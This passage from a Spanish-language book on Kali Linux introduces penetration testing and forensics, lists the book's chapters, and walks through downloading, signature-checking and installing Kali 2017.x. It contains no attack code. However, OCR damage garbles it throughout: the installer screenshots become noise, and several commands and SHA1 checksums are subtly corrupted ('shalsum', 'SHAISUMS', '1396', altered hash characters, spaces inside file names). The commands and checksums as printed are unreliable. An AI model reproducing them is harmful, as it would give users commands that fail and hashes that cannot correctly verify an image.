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INTRODUCCIÓN 


Los pentests, tests de intrusión o test de penetración son unas auditorías de 
seguridad activas, por las que el auditor utiliza con permiso explícito del dueño de 
unos sistemas informáticos y contra los susodichos sistemas las herramientas que 
los atacantes emplearían para poder atacar. Comparte técnicas, y herramientas con 
lo que es el hacking -tal y como entiende esta palabra la sociedad y los medios de 
comunicación, aunque la palabra hacking tiene un significado muy distinto para los 
especialistas en informática-. La diferencia es que el hacking busca al final de la 
operación el defacing -es decir, cambiar la página para mostrar que se ha "estado 
ahí"-, el robo de información, la alteración de la información, o simplemente el hacer 
dano. Por otro lado, el pentest se hace, como hemos comentado, con el conocimiento 
y consentimiento del propietario; y para cuando se encuentra la vulnerabilidad; con 
el objeto de documentarlo, y poder explicarla al cliente para que la solucione y no le 
ataquen por ese camino. 


La informática forense tiene también su propia problemática. En informática 
forense es clave preservar la prueba y no alterarla. Por ello, requiere de unas 
herramientas que no “monten” de forma automática la unidad, y nos permitan 
volcarla y posteriormente analizarla sin alterarla lo más mínimo, de forma voluntaria 
o involuntaria. 


Kali es actualmente la distribución de Linux de referencia para la realización 
de tests de intrusión, y trabajos de informática forense. Tiene todas las ventajas de una 
Debian en numero de paquetes y extensa documentación, unidas a una gran cantidad 
de aplicaciones preinstaladas, y unos modos de trabajo en live, live forensics y en 
persistencia que la hacen ideal para el trabajo del especialista de seguridad. 


El objetivo de este libro es dar primero una visión introductoria a Kali: qué 
es, y cómo se instala. Qué es y cómo se configura el modo de persistencia —de utilidad 
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extrema para desplazarse con la herramienta-. Cuál es la mecánica para hacer una 
prueba de intrusión con Kali. Cuales, de los cientos de herramientas que se dispone 
en Kali, serán las herramientas más utiles en cada fase del test de intrusion, y cómo 
se utilizan. Y cómo arrancar y utilizar Kali en modo forense para generar imágenes 
de disco sin alterar la prueba, y cómo manejar esas imágenes. 


El libro se divide en los siguientes capítulos: 


1. La distribución Kali 

2. Kali para tests de intrusión. Fases de un test de intrusión 
3. Recogida de información inicial con Kali 

4. Análisis básico de vulnerabilidades 

5. Ataques a contrasenas 

6. Auditorías a redes Wifi 

7. Auditorías a aplicaciones web 

8. Metasploit 

9. Advertencia legal 

10. Análisis forense con Kali 


Esperamos que sean de utilidad para tu futuro profesional. 





LA DISTRIBUCIÓN KALI 


Kali es una distribución de Linux basada en Debian, disenada para la auditoría 
de seguridad, los tests de intrusión y la informática forense. Es una mejora sobre la 
muy conocida y ya obsoleta BackTrack. Mientras que BackTrack no se actualiza 
desde el 2012, Kali está muy activa y su ultima versión estable en las fechas en las 
que se escribe este libro es de Septiembre del 2017: la Kali 2017.2. 


Al ser basada en Debian, podemos hacer todo lo que se puede hacer en una 
Debian. La instalación de paquetes es la misma, y la configuración es análoga. Los 
documentos y la información que podemos encontrar en Internet sobre Debian, nos 
valen para Kali. 


Kali está mantenida por una empresa -Offensive Security Ltd.-. Utiliza 
paquetes GPL, por lo que el código fuente está disponible. Su desarrollo está muy 
focalizado en un grupo pequefio de desarrolladores de confianza, que firman los 
paquetes con GPG para evitar troyanos en la distribución. 


Kali está disponible a las arquitecturas Debian i386 -32 bits-, AMD64 
-64 bits-, y ARM -armel y armhf-. Esta ültima versión permite utilizar Kali desde 
Raspberry Pi, o un Samsung Galaxy Note, entre otros dispositivos ARM -de hecho, 
funciona para muchos dispositivos Android 2.1-. Se distribuye en versiones light y 
completa; y es posible obtener imágenes para VMWare y VirtualBox de Kali. Además, 
mediante un mecanismo no excesivamente complicado, es posible descargar vía GIT 
el código fuente de Kali y el bootstrap del CD; y compilar una Kali "a medida", que 
tenga exactamente lo que queremos. 


Kali incluye más de 600 aplicaciones para auditoría de seguridad e 
informática forense; incluyendo escáneres de puertos -como ММАР-, sniffers - 
como Wireshark—, suites de crackeo Wifi —como Aircrackng-, suites para construir 
troyanos y exploits -como Metasploit-, o programas para descubrir claves -como 
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John the Ripper-. Incluye también un modo forense de arranque, en el que el disco 
duro no se utiliza en absoluto: aunque encuentre una partición swap no se usa ni 
se monta, no se monta ninguna partición del disco, y se desactiva el automontado. 
Tampoco levanta de forma automática las tarjetas de red. Kali utilizado desde un 
llavero USB o desde un CD es una herramienta forense excepcional. 


1.1 DESCARGANDO KALI 2017.2 


Podemos descargar la imagen de la Kali de la web: 
https://www.kali.org/downloads/ 

Una vez que la hemos descargado, podemos descargarnos la clave 
PGP de Kali: 

wget -q -O - https://www.kali.org/archive-key.asc | gpg --import 

Debiendo salir algo parecido a: 


gpg: clave 7D8DOBF6: clave publica "Kali Linux Repository 
<devel@kali.org>" importada 

gpg: Cantidad total procesada: 1 

gpg: importadas: 1 (АЅА: 1) 


Descargamos las firmas digitales SHAISUMS y SHAISUMS.gpg, у 
verificamos la firma digital: 


wget http://cdimage.kali.org/kali-2017.2/SHA1SUMS 
wget http://cdimage.kali.org/kali-2017.2/SHA1SUMS.gpg 
gpg --verify SHAISUMS.gpg SHA1SUMS 


Debe aparecer algo similar а: 


gpg: Firmado el lun 18 sep 2017 20:50:52 CEST usando clave 

RSA ID 7D8DOBF6 

gpg: Firma correcta de "Kali Linux Repository <devel@kali. 

org>" 

gpg: ATENCIÓN: jEsta clave no está certificada por una 

firma de confianza! 

gpg: No hay indicios de que la firma pertenezca 
al propietario. 
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Huellas dactilares de la clave primaria: 44C6 513A 8E4F 
B3D3 0875 F758 ED44 4FFO 7080 OBF6 


Lo importante es que aparezca “clave RSA ID 7D8DOBF6" y “firma correcta” 
51 no aparece, es que nos están intentando colar un fichero SHA1 manipulado. 


Después, basta con descargar Kali; por ejemplo, para la Kali completa para 
arquitecturas AMD64: 


wget http://cdimage.kali.org/kali-2017.2/kali-linux -2017.2-amd64.iso 
Y la Kali completa para arquitecturas 1396: 
wget http://cdimage.kali.org/kali-2017.2/kali-linux -2017.2-i386.iso 


Finalmente, verificamos la firma de los archivos que hemos descargado; 
haciendo: 


shalsum kali-linux-2017.2-amd64.iso 

Lo que da: 

18dc614dca401b854e40f0b189975b8978544068 kali-linux -2017.2-amd64.iso 
O: 

shalsum kali-linux-2017.2-i386.iso 

Lo que da: 

1fc806f4bd10016ed60c1f07c9b27c1ac37df0d3 kali-linux -2017.2-i386.iso 


Vemos las firmas SHA1 de estas imágenes en el archivo cuya firma GPG 
hemos comprobado: 


cat SHA1SUMS 
Obteniendo: 


18dc614dca401b854e40f0b189975b8978544068 kali-linux -2017.2-amd64.iso 
1fc806f4bd10016ed60c1f07c9b27c1ac37df0d3 kali-linux -2017.2-i386.iso 
f2476071cb6f94b061d42273063e804114595325 kali-linux-e17 -2017.2-amd64.iso 
9c6d5e051ef951e6c2b1468aa39e62c69f31f115 kali-linux-kde -2017.2-amd64.iso 
0387b4da71fb118e42d6672af8c957ff65d40f21 kali-linux-light -2017.2-amd64.iso 
e734c008dced8b87ce66672b051eb56e7f33a810 kali-linux-light -2017.2-i386.iso 
83d312b844b180582e4033c6268ae00e476bddea kali-linux-Ixde -2017.2-amd64.iso 
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2b85b4536d634cf5b7cf407107a88083c323b769 kali-linux-mate -2017.2-amd64.iso 
b1c7b0e082159e4a35a630ddee9767b7374fb0c5 kali-linux-xfce -2017.2-amd64.iso 
£653072d889a72620bb51fce4539fb7clee9b201 kali-linux-light -2017.2-armel.img.xz 
cf65c89f0da599bb01a21e8d698e729eac2616c0 kali-linux-light -2017.2-armhf.img.xz 


Debe coincidir, en cualquier caso. Si no coinciden, algo ha fallado en la 
descarga. 


Lo siguiente es grabarla en DVD o CD con el programa de grabación favorito 
-también funciona volcando la imagen en un llavero USB; lo que podemos hacer 
con cat o con dd-. Finalmente, la instalación, es idéntica a la de una Debian; vamos 
a pasar a comentarla más adelante. 


1.2 DESCARGANDO KALI 2017.1 


La diferencia entre Kali 2017.2 y Kali 2017.1 es que la 2017.2 tiene los 
paquetes más actualizados. Es cierto que la Kali 2017.2 trae en el DVD algün 
paquete adicional, que no instala en la instalación; pero si instalamos desde la 
Kali 2017.1, después de hacer el apt-get update, estos paquetes estarán accesibles 
para su instalación. En cualquier caso, instalemos desde Kali 2017.1 o desde Kali 
2017.2, después del apt-get dist-upgrade tendremos los mismos paquetes instalados, 
y las mismas versiones de estos paquetes. Si ya tenemos instalada la Kali 2017.1, 
no necesitamos reinstalar la Kali 2017.2 si actualizamos paquetes. Y si hemos 
descargado la Kali 2017.1, podemos hacer el proceso de instalación desde un DVD 
o un USB con la Kali 2017.1; recordando hacer la actualización de paquetes al final 
del proceso, tal y como comentaremos en este libro. 


Es importante que tengamos en cuenta que, salvo el proceso de descarga, 
no vamos a observar diferencias significativas ni en el proceso de instalación ni en 
los procesos posteriores de configuración: el salto entre ambas versiones es apenas 
actualización de paquetes. 


El proceso de instalación para la Kali 2017.1 es idénticos que para la Kali 
2017.2; con la diferencia de que descargamos las firmas digitales SHAISUMS y 
SHAISUMS.gpg, y verificamos la firma digital con: 


wget http://cdimage.kali.org/kali-2017.1/SHA1SUMS 
wget http://cdimage.kali.org/kali-2017.1/SHA1SUMS.gpg 
gpg --verify SHAISUMS.gpg SHA1SUMS 
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Ahora debe aparecer algo similar a: 


gpg: Firmado el dom 23 abr 2017 17:45:20 CEST usando clave RSA ID 7D8DOBF6 
gpg: Firma correcta de "Kali Linux Repository <devel@kali.org>" 
gpg: ATENCIÓN: ¡Esta clave no está certificada por una firma de confianza! 
gpg: No hay indicios de que la firma pertenezca al propietario. 
Huellas dactilares dela clave primaria: 44C6 513A 8E4F 
B3D3 0875 F758 ED44 4FFO 7D8D OBF6 


Como en el caso anterior, lo importante es que aparezca "clave RSA ID 


7D8DOBF6” y “firma correcta" si no aparece, es que nos están intentando colar un 
fichero SHA1 manipulado. 


Después, basta con descargar Kali; por ejemplo, para la Kali completa para 
arquitecturas AMD64: 


wget http://cdimage.kali.org/kali-2017.1/kali-linux -2017.1-amd64.iso 
Y la Kali completa para arquitecturas 1396: 
wget http://cdimage.kali.org/kali-2017.1/kali-linux -2017.1-i386.iso 


Finalmente, verificamos la firma de los archivos que hemos descargado; 
haciendo: 


shalsum kali-linux-2017.1-amd64.iso 

Lo que da: 

05765cbb81dfc898a4ddee4cla27a7c2e888f796 kali-linux -2017.1-amd64.iso 
O: 

shalsum kali-linux-2017.1-1386.iso 

Lo que da: 

79f67e131e1514d884007b24cfd4976383e69a24  kali-linux -2017.1-i386.iso 


Vemos las firmas SHA1 de estas imágenes en el archivo cuya firma GPG 
hemos comprobado: 


cat SHAISUMS 
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Obteniendo: 


05765cbb81dfc898a4ddee4c1a27a7c2e888(796 kali-linux -2017.1-amd64.iso 
79f67e131e1514d884007b24cfd4976383e69a24 kali-linux -2017.1-i386.iso 
e37dc147adc2d1d5fc1d151a60e3cO4bfbdbdc84 kali-linux-e17 -2017.1-amd64.iso 
474932ced686e7e7756d2236f7eb6ff3f7 187956 kali-linux-kde -2017.1-amd64.iso 
080607004800bcd79f225f437b10fa611d7bc414 kali-linux-light -2017.1-amd64.iso 
9e7dcdee2025cf29f6eb5e250530ecc68479f73b kali-linux-light -2017.1-i386.iso 
d59bce4b4053eaef3de2fe8eae6bcfcf7eda00c0 kali-linux-Ixde -2017.1-amd64.iso 
75cd89a8eb2a070034926827d20a61acfa187e80 kali-linux-mate -2017.1-amd64.iso 
384c2d8aa71c7bd8ea0a2ec94e7358a9268b44b4 kali-linux-xfce -2017.1-amd64.iso 
19c2ee9320d9894321408ccda66eb101352d52fc kali-linux-light -2017.1-armel.img.xz 
853847f616dd92cdc8a0bd8b0e1c8e8d40da7808 kali-linux-light -2017.1-armhf.img.xz 


Debe coincidir, en cualquier caso. Si no coinciden, algo ha fallado en la 
descarga. 


Como en el caso anterior, lo siguiente es grabarla en DVD o CD con el 
programa de grabación favorito -también funciona volcando la imagen en un llavero 
USB; lo que podemos hacer con cat o con dd-. Finalmente, la instalación es idéntica 
ala de una Debian: la comentaremos más adelante. 


1.3 DESCARGANDO KALI DEL REPOSITORIO GIT 


Finalmente, podemos construir una Kali customizada con la secuencia de 
comandos: 


apt-get install git live-build cdebootstrap 

git clone git://git.kali.org/live-build-config.git 
cd live-build-config 

./build.sh --distribution kali-rolling --verbose 


No vamos a entrar en detalle en este libro en cómo se hace una Kali 
customizada, porque no será algo que utilicemos habitualmente. 


1.4 INSTALACIÓN DE KALI 


Llegamos desde la Kali 2017.2 o desde la Kali 2017.1, de aquí en adelante 
los pasos son idénticos. Instalar Kali sigue un proceso análogo al de cualquier otra 
distribución derivada de Debian. Arrancamos desde el DVD que hemos descargado: 
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КАП 


“the quieter you become, the more you are able to hear” 


Boot menu 


Live (amd64) 

Live (amd64 failsafc) 

Livc (forcnsic modc) 

Livc USB Pcrsistcncc (check kali.org/prst) 
Live USB Encrypted Persistence (check kali .org/prst) 
Install 

Graphical install 

Install with speech synthesis 

Advanced options 





Y seleccionamos a instalar -Install-. Después de un tiempo de espera en el 
que arrancará el instalador, seleccionamos idioma —espanol-: 


[111 Select a language 


Choose the language to be used for the installation process. The selected language will 
also be the default language for the installed sustem. 


Language: 


Korean 

Kurdish 

Latvian 
Lithuanian 
Macedonian 
Northern saml 
Norwegian Bokmaal 
Noruegian Nynorsk 
Persian 

Polish 

Portuguese 
Portuguese (Brazil) 
Romanian 

Russian 

Serbian (Durillic) 
Slovak 

Slovenian 
spanish 

Swedish 

Tagalog 

Tajik 

Thai 


#0} : 
Kurdî 
Latviski 
Lietuviškai 
Македонски 
запер 11111 
Norsk bokmål 
Norsk nunorsk 
ST ous 
Polski 
Portugués 
Portugués do Srasil 
Romana 
РУССКИЙ 
Српски 
Slovencina 
Slovenščina 
| 
+ 


En m T 
ESPA! iu 


| 


D 


EE ES E ов ЕЕ НО RS PES EL 


Svenska 
Tagalog 
ТОҶИКӢ 
5191 1nu 


Türkce 


«Gn Back» 


5 Buttons 
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Nos va a avisar que la traducción es incompleta, pero eso no es problema. 
Nos aparecerá en inglés lo que no esté traducido. Decimos que sí: 





lab> mueve; «Espacio» selecciona; «Intro» activa un botón 


Seleccionamos como ubicación para zona horaria el lugar donde estamos: 


(Tah» mueve; «Espacia» selecciona; «Intro» activa un botón 
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Seleccionamos el teclado: 


[11] Configure el tecladc 


Mapa de teclado a usar: 


Kirghizo 

Coreano 

Kurdo (variante F) 
Kurdo (variante 0) 
Laosiano 
Latinoamericano 
Letón 

Lituano 

Macedonio 
Malayalamo 
Nepales 

Sami septentrional 
Noruego 

Persa 

Filipino 

Polaco _ 
Portugués 

Panyabi 

Rumano 

Ruso 

Serbio (cirilico) 
Sindhi 
Cingalés 
Eslovaco 
Esloveno 


<Retroceder> 











b> mueve; <Espacio> selecciona; «Intra» activa un boten 
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Y ahora esperamos un rato. Tendremos que configurar la IP, o aceptar la 


configuración del servidor DHCP: 


рр ара 
intenta 
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Después indicamos el nombre que le pondremos a la máquina: 


igurar la red 


Рог favor, introduzca el nombre de la máquina. 


El nombre de máquina es una sola palabra que identifica el sistema en la red. Consulte al 
administrador de red si no sabe qué nombre deberia tener. Si está configurando una red 
domestica puede inventarse este nombre. 


Nombre de la maquina: 


<Retroceder> «Cant inuar> 


¿Tahs mipyves zEenarins celerrianas ¿Tnteos activa un hntüàn 





Y el nombre del dominio -lo que dejamos en blanco, si no sabemos qué 
hacemos-: 


El nombre de dominio es La parte de su dirección de Internet a la derecha del nombre de 
sistema. Habitualmente es algo que termina por .com, .net, .edu, o .org. Puede 
inventarselo si esta instalando una red doméstica, pero asegürese de utilizar el mismo 
nombre de dominio en todos sus ordenadores. 


Nombre de dominio: 


«Retroceder» «pont inuar> 





«Tal» mueve; «Espaclu» selecciona; «Intro» activa un botón 
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Indicamos la clave de root: 


[!!] configurar usuarios y contraseñas 


Necesita definir una contraseña para el superusuario («rootw), la cuenta de 
administración del sistema. Podria tener graves consecuencias que un usuario malicioso o 
un usuario sin la debida cualificación tuviera acceso a la cuenta del administrador del 
sistema, asi que debe tener cuidado u elegir un la contraseña para el superusuario que no 
sea fácil de adivinar. No debería ser una palabra que se encuentre en el diccionario, о 
una palabra que pueda asociarse fácilmente con usted. 


Una buena contraseña debe contener una mezcla de letras, números y signos de puntuación, 
y debe cambiarse regularmente. 


La contraseña del usuario ¿roots (administrador) no deberia estar en blanco. Si deja este 
valor en blanco, entonces se deshabilitará la cuenta de root creará una cuenta de usuario 
a la que se le darán permisos para convertirse en usuario administrador utilizando la 
orden «sudo. 

Tenga en cuenta que no podrá ver la contraseña mientras la introduce. 


Clave cel superusuario: 


«Retroceder» «Cont inuar> 


activa un boten 





Y la repetimos, exactamente igual: 


[!!] Configurar usuarios y contraseñas 


Por favor, introduzca la misma contraseña de superusuario de nuevo para verificar que la 
introdujo correctamente. 


vuelva a introducir la contraseña para su verificación: 


<Retroceder> ¿Continuar> 


ciona; ¿Intro tiva un botón 
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Las versiones de Kali hasta la 2017.1 no piden crear un usuario adicional 
que no sea root. La versión 2017.1 ya lo pide; introducimos primero el nombre real 
de este usuario que no tendrá el privilegio de administrador: 


ios y contraseñas 


Se creará una cuenta de usuario para que la use en vez de la cuenta de superusuario en 
sus tareas que no sean administrativas. 


Por favor, introduzca el nombre real de este usuario. Esta información se usará, por 
ejemplo, como el origen predeterminado para los correos enviados por el usuario o como 
fuente de información para los programes que muestren el nombre real del usuario. Su 
nombre completo es una elección razonable. 


Nombre completo para el nuevo usuario: 


«Retroceder» «cont Lnuar> 





«Tal» mueves «Espaciu» selecciona; «Intro» activa un botón 


Introducimos el login que utilizará: 


111] Configurar usuar 
Selecciona un nombre de usuario para la nueva cuenta. Su nombre, sin apellidos ni 
espacios, es una elección razonable. El nombre de usuario debe empezar con una letra 
minúscula, seguida de cualquier combinación de números y más letras minúsculas. 


Nombre de usuario para la cuenta: 


<Retraceder> <Cont inuar> 


<Intro» activa un botón 
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Introducimos la clave que queramos que utilice: 


[!!] Configurar usuarios y contraseñas 


Una buena contraseña debe contener una mezcla de letras, números y signos de puntuación, 
y debe cambiarse regularmente. 


Elija una contraseña pera el nuevo usuario: 


EE AAA AAA AAA AO A 


<Retroceder> «Dont inuar> 


«Tab» mueve: «Espacio» selecci «Intro» activa un boton 





Y confirmamos la clave, repitiéndola: 


[11] Configurar usuarios y contraseñas 


Por favor, introduzca la misma contraseña de usuario de nuevo para verificar que la 
introdujo correctamente. 


vuelva a introducir la contraseña para su verificación: 


«Retroceder» «bant inuar> 





4Tah» miewa: £Fznarin» «elecrinna: ¢Tateas activa un hntün 
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Indicamos la zona horaria, a través de la ubicación: 


[1] Configurar el reloj 


Si la zona horaria deseada no está en la lista entonces vuelva atrás al paso «Escoja el 
idioma» y seleccione un pais que utilice la zona horaria deseada (el pais donde vive n 
está ubicado). 


seleccione una ubicación en su zona horaria: 


Ceuta ч Melilla 
Islas Canarias 


«Retroceder» 





«Tab» mueve; «Espacio» selecciona; <intro> activa un botón 


Y llegamos al particionado. Primero seleccionamos el disco que queremos parti- 





[111 Particionado de discos 


Este es un resumen de las particiones y puntos de montaje que tiene configurados 
actualmente. Seleccione una partición para moditicar sus valores (sistema de ficheros, 
puntos de montaje, etc.), el espacio libre para añadir una partición nueva o un 
dispositivo para inicializar la tabla de particiones. 


Particionado guiado 
Configurar los volúmenes iSCSI 


Deshacer los cambios realizados a las particiones 


Finalizar el particionado y escribir los cambios en el disco 


«Retroceder» 


«F1» para auuda; «Tab» mueve: «Espacio» selecciona; «Intro» activa un boton 
cionar: 


Si el disco no tiene tabla de particiones, nos preguntará si queremos crearla: 
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[11] Particionado de discos 
Ha seleccionado particionar el dispositivo completo. Si continúa creará una tabla de 
particiones en el dispositivo y se eliminarán todas las particiones que existían 
previamente. 
Observe que podrá deshacer esta operación más adelante si lo desea. 


¿rear una nueva tabla de particiones vacia en este dispositivo? 


«Retroceder» Eu «No» 





selecciona; «Intro» activa un botón 


En cuyo caso, nos aparece el espacio libre, y podemos seleccionar -ahora 
sí- el disco: 


[11] Particionado de discos 


Éste es un resumen de las particiones y puntos de montaje que tiene configurados 
actualmente. Seleccione una partición para modificar sus valores (sistema de ficheros, 
puntos de montaje, etc.), el espacio libre para añadir una partición nueva n un 
dispositivo para inicializar la tabla de particiones. 


Particionado guiado 

Configurar RAID por software 

Configurar el Gestor de Volümenes Lógicos (LYM) 
Configurar los volúmenes cifrados 

Configurar los volúmenes iSCSI 


pri/lóg 8.6 GB ESPACIO LIBRE 


Deshacer los cambios realizados a las particiones 
Finalizar el particionado y escribir los cambios en el disco 


«Retroceder» 


«F1» para ayuda; «Tab» mueve; «Espacio» selecciona; «Intro» activa un botón 
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Lo seleccionamos, y decimos que queremos crear una partición nueva: 


[11] Particionado de discos 


Como usar éste espacio libre: 





Pear Una particion nueva. 


Particionar de forma automática el espacio libre 
Mostrar información de Cilindros/Cabezas/Sectores 


<Retroceder> 





Después indicamos el tamano. Ojo, 8’6 GB es el minimo. Si queremos tener 
algo de margen de maniobra para poder trabajar con Kali, el minimo recomendado 
es 16 GB: 


[11] Particionado de discos 
El tamaño máximo para esta partición es 8.6 GB. 


Nota: puede utilizar "тах'' como una forma rápida de especificar el valor máximo, o 
introducir un porcentaje (p.ej. "20%') para utilizar ese porcentaje del tamaño maximo. 


Nuevo tamaño de particion: 


<Retroceder> <Continuar> 








<Tab> mueve; lo» selecciona; «intro» activa un botón 
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Seleccionamos la partición como primaria: 


[11] Particionado de discos 
Tipo de la nueva partición: 


EE 
Lógica 


«Retroceder» 


«Tab» <Esgeclo> selecciona; <Intro> activa un botón 


Está editando la partición #1 de SCSI1 (0,0,0) (sde). NO se ha detectado ningún sistema 
de ficheros en esta particion. 


Configuración de la partición: 





ШЕ ЖЕН 5іѕгета: йе ES TES satt: Lona 1} 





Punto de montaje: ^ 

Opciones de montaje: defaults 
Etiqueta: ninguno 
Bloques reservados: 5% 

Uso habitual: estándar 
Marca de arranque: desactivada 


Borrar la partición 
Se ha terminado de definir la partición 


«Retroceder» 


«F1» para avuda; «Tab» mueve; < jig» seleccione; «Intro» activa un botón 
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Aunque personalmente recomiendo cambiarlo por XFS: 


[111 Particionado de discos 


Está editando la partición #1 de SC311 (0,0,0) (sda). No se ha detectado ningün sistema 
de ficheros en esta partición. 


Configuración de la partición: 


Punto de montaje: ё 

Opciones de montaje: defaults 
Etiqueta: ninguno 
Manca de arranque: desact ivada 


Borrar la partición А 
Se ha terminado de definir la partición 


«Retroceder» 





> para ayuda; < > ES acio ecciona; «Intro» active un botón 
Activamos la marca de arranque: 


111] Particionado de discos 


Está editando la partición #1 de SCSIi (0,0,0) isda). No se ha detectado ningún sistema 
de ficheros en esta partición. 


Configuración de la partición: 
Utilizar como: sistema de ficheros transaccional XFS 


Punto de montaje: га 
Opciones de montaje: defaults 


eun ХЕР 


Borrar la partición 
Se ha terminado de definir la partición 


«Retroceder» 





ecciona; «Intro» activa un botin 


Descargado en: eybooks.com 
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Y ya seleccionamos que hemos terminado de definir la partición: 


[11] Particionado de discos 


Está editando la nartición #1 de SCSI1 (0,0,0) (sda). No se ha detectado ningún sistema 
de ficheros en esta partición. 


Configuración de la partición: 


Utilizar como: sistema de ficheros transaccional XFS 
Punto de montaje: z 
Opciones de montaje: defaults 


Etiqueta: ninguno 
Marca de arranque: activada 


ER la pn ición 


«Retroceder» 


«F1» para ayuda: «Tab» mueve; «Espacio» selecciona; «Intro» activa un boton 





Seleccionamos la opción de finalizar el particionado, y escribir los cambios: 


[11] Particionado de discos 


Éste es un resumen de les particiones y puntos de montaie que tiene configurados 
actualmente. Seleccione una partición рага modificar sus valores (sistema de ficheros, 
puntos de montaje, etc.), el espacio libre para afiadir una partición nueva o un 
dispositivo para inicializar la tabla de particiones. 


Particionado guiado 

Configurar RAID por software 

Configurar el Gestor de Volúmenes Lógicos (LVM) 
Configurar los volúmenes cifrados 

Configurar los volumenes iSCSI 


SCSI1 (0,0,0) (sda) - 8.6 GB ATA VBOX HARDDISK 
#1 primaria 8.6 GB B f xfs 7. 


Deshacer los cambios realizados a las DS 


«Retroceder» 





«F1» para ayuda; «Tab» mue 4 > ciona; «Intro» activa un boton 
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En este ejemplo concreto no he configurado una partición específica para 
memoria de swap, ya que personalmente prefiero definir luego a mano un fichero de 
swap. Si estamos de acuerdo con hacer eso, seleccionamos la opción No: 


No ha seleccionado una partición para que se use como espacio de intercambio. El uso de 

un espacio de intercambio es recomendable para que el sistema pueda hacer un mejor uso de 
la memoria fisica disponible y para que se comporte mejor si la memoria fisica es escasa. 
Puede sufrir algún problema durante la instalación si no tiene suficiente memoria fisica. 


La instalación continuará sin espacio de intercambio si no vuelve al menú de particionado 
y asigna un punto de montaje a la partición de intercambio. 


¿Desea volver al menú de particionado? 


«Retroceder» 


acia» selecciona; «Intra» activa un botón 





Marcamos que deseamos escribir los datos en los discos: 


[11] Particionado de discos 


Se escribirán en los discos todos los cambios indicados a continuación si continúa. Si по 
lo hace podrá hacer cambios manualmente. 


Se han modificado las tablas de particiones de los siguientes dispositivos: 
56511 (0,0,0) (зда) 


Se formatearan las siguientes particiones: 
partición #1 de SCST1 (0,0,0) (50а) como xfs 


¿Desea escribir los cambios en los discos? 





lona; «Intro» activa un botón 
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Y pasamos a instalar el sistema. Aquí debemos tener paciencia, porque el 
proceso puede ser largo: 


Copiando datos а disco... 





Nos pregunta si queremos utilizar una réplica de red. Si disponemos de 
conexión a Internet, es muy recomendable que marquemos que sí: 


[1] Configurar el or de paquetes 


Fuede utiliza" una réplica en red para complementar los programas incluidos en ei CD-RUM. 
Esto tambien puede hacer que tenga a su disposicion nuevas versiones ce los programas. 


éDesea utilizar una réplica en red? 


<Retroceder> 





¿Tab> mueve; «Espacio» selecciona; «Intro» activa un boton 


En caso de que marquemos que sí, nos pregunta por el proxy. Si no sabemos 
lo que es, o no lo necesitamos, lo dejamos en blanco y le damos a continuar: 
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[!] Configurar е1 gestor de paquetes 


Si tiene que usar un proxy HTTP para acceder a la red, introduzca a continuación la 
informacion sobre el proxy. En caso contrario, dejelo en blanco. 


La información del proxy debe estar en el formato 
&http:z7 [usuario] [:contraseñal à] servidor [:puerto] /» 


Información de proxy HTTP (en blanco si no desea usar ninguno): 


«Retroceder» «Continuar? 





Lo siguiente será instalar Grub, el cargador de arranque: 


Instalando el cargador de erranque GRUB 


Ejecutando dpkg 





Es recomendable decir que deseamos instalar Grub en el registro principal 
de arranque: 


[!] Instaler el cargedor пе arranque GRUB en un disco duro 


Parece que esta instalación es el Único sistema operativo en el ordenador. Si esto es 
asi, puede instalar sin riesgos el cargador de arranque GRUB en el registro principal de 
arranque del primer disco duro. 


Aviso: Si el instalador no pudo detectar otro sistema operativo instalado en el sistema, 
la modificación del registro principal de arranque hará que ese sistema operativo no 
puede arrancarse. Sin embargo, podrá configurar GRUB manualmente más adelante para 
arrancarlo. 


¿Desea instalar el cargador de arranque GRUB en el registro principal de arranque? 


«Retroceder? ES S dq 





b> mueve: «Espacio» selecciona; «Intro» activa un boton 
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Para la cual, debemos también seleccionar el dispositivo de arranque de la 
lista: 


Ahora debe configurar el sistema recién instalado para que sea arrancable, instalando 
para ello el cargador GRUB en un dispositivo del que se pueda arrancar. La forma habitual 
de hacerlo es instalar GRUB en el registro principal de arranque (4master boot records) 
del primer disco duro. Si lo prefiere, puede instalar GRUB en cualouier otro punto del 
disco duro, en otro disco duro, o incluso en un disquete. 


Dispositivo donde instalar el cargador de arranque: 





Introducir el dispositivo manualmente 


Kcewsda ts /BOX HARDDISK VB? 





<Retroceder> 


«Tab» mueve; <ESpacio> selecciona; «Intro» activa un botón 





Estamos ya cerca del final. Cuando dice que la instalación ha completado, no 
apagamos el ordenador, sino le damos a continuar: 


[!!] Terminar le instalación 


Instalacion completada 
La instalación se ha completado. Ahora podrá arrancar el nuevo sistema. Asegúrese de 
extraer el disco de instalación (CD-ROM o disquetes) para que el sistema arranque del 
disco en lugar de reiniciar la instalación. 


«Retroceder» ЕЕ inuens| 





«Tab» mueve; selecciona; <Iniro> activa un boton 
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Ya que todavía le quedan por hacer bastantes operaciones, ya que la 
instalación desde Kali hace más operaciones aquí que una Debian comun: 





Un problema que tenía Kali en su 2016.1 es que su instalación fallaba 
completamente con el menor problema con un paquete en el DVD. La 2016.2 era 
bastante sensible también al respecto. En la 2016.1 esto personalmente lo resolvía 
utilizando la mini, y descargando los paquetes a instalar desde Internet. La 2016.2, 
sin embargo, no tenía mini, y además el repositorio de la mini ya no estaba accesible. 
Esto significaba que en algunos hardware con una tasa de fallos un poco más alta de 
la cuenta, el proceso de instalación de la distribución era problemático. 


Las Kali versiones 2017.2 y 2017.1 siguen sin tener versión mini; y 
aparentemente son algo más estables en la instalación que la versión 2016.2; pero 
la estabilidad del proceso de instalación sigue dependiendo de que el hardware sea 
lo suficientemente estable para soportar la instalación “del tirón". En concreto, las 
instalaciones en las que un USB se particiona en dos, en una partición se vuelca la 
imagen de Kali y se hace una instalación limpia en la segunda partición del mismo 
llavero USB el que la instalación funcione sin problemas o no depende de que la 
controladora de USB sea de calidad y tolere la carga. Las instalaciones virtualizadas 
y las instalaciones directas a disco duro no me han dado ningün problema; por lo 
que en el uso habitual no dará problemas. De cualquier forma, utilizar la Kali así 
instalada nunca ha sido personalmente mi primera opción; personalmente prefiero la 
modalidad de persistencia, por la problemática legal de este tipo de herramientas en 
muchos países. 
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1.5 UTILIZANDO KALI SIN INSTALAR: LA MODALIDAD DE PERSISTENCIA 


1.5.1 Porqué es interesante la modalidad de persistencia 


Algunas personas prefieren no hacer una instalación de Kali pura, como con 
cualquier otra distribución, sino una instalación de persistencia. 


La instalación de persistencia básicamente consiste en que se utiliza la 
imagen Live del DVD, pero se pueden instalar paquetes, almacenar paquetes y 
guardar datos sobre ella. 


Personalmente la considero interesante ya que podemos tener un Kali 
plenamente funcional y personalizado en un llavero USB. Además, la Kali con 
persistencia mantiene la posibilidad de arrancarla en modo forense; lo que la 
convierte en una herramienta extremadamente potente. 


